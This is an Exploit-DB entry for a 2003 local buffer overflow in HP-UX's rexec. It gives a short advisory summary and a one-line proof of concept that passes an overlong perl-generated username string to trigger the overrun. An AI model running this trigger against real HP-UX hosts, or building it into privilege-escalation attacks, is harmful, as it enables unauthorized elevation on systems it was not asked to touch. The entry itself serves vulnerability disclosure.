HP-UX 10.x/11.x - RExec Remote 'Username' Flag Local Buffer Overrun

EDB-ID:

22552




Platform:

HP-UX

Date:

2003-04-29


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

source: https://www.securityfocus.com/bid/7459/info

It has been reported that a problem in the rexec program included with some versions of HP-UX may be vulnerable to a boundary condition error. It may be possible for a local user to exploit this vulnerability to gain elevated privileges on the system. 

exec 127.0.0.1 -l `perl -e 'printf "A" x 9777'` -n something